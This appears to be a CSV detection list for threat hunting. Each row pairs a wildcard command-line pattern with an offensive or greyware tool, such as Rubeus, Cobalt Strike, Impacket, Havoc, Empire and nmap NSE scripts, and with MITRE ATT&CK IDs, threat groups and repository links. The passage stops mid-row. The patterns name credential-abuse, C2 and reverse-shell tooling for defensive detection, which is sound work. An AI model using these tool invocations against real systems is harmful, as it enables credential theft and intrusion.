/monitorinterval:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* -hasbootstraphint *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* -hashes * -spn * -impersonate *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -hashes lm:nt -gpo-id * -powershell *,offensive_tool_keyword,pyGPOAbuse,python implementation of SharpGPOAbuse,T1566.001 - T1059.006 - T1112,TA0001 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/Hackndo/pyGPOAbuse,1,0,N/A,8,2,178,26,2023-01-20T19:02:09Z,2020-05-10T21:21:27Z -* --hash-type * --attack-mode *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* hashview.py*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -* hashview-agent *,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -* havoc-client*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -* hbase-master-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hbase-region-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hddtemp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* HiddenDesktop.cna*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -* hnap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --hoax-port *,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -* hollow.x64.*,offensive_tool_keyword,cobaltstrike,EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/HOLLOW,1,0,N/A,10,10,235,56,2023-03-08T15:51:19Z,2021-07-21T15:58:18Z -* --host * --port * --executable *.exe --command *cmd.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* host -p * --allow-anonymous --protocol https*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -* hostenum.py *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,0,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -* --host-file *.txt -u * --prompt --admin --no-banner*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -* hostmap-bfk.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hostmap-crtsh.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hostmap-robtex.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Hosts * -TopPorts *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Portscan.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* hping3 *,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -* http://localhost:8080 -o agent*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -* http_malleable*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* http-adobe-coldfusion-apsa1301.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-affiliate-id.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-apache-negotiation.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-apache-server-status.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-aspnet-debug.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-auth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-auth-finder.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-avaya-ipoffice-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-awstatstotals-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-axis2-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-backup-finder.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-barracuda-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-bigip-cookie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cakephp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-chrono.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cisco-anyconnect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-coldfusion-subzero.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-comments-displayer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-config-backup.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cookie-flags.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cors.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-cross-domain-policy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-csrf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-date.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-default-accounts.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-devframework.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-dlink-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-dombased-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-domino-enum-passwords.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-drupal-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* http-drupal-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 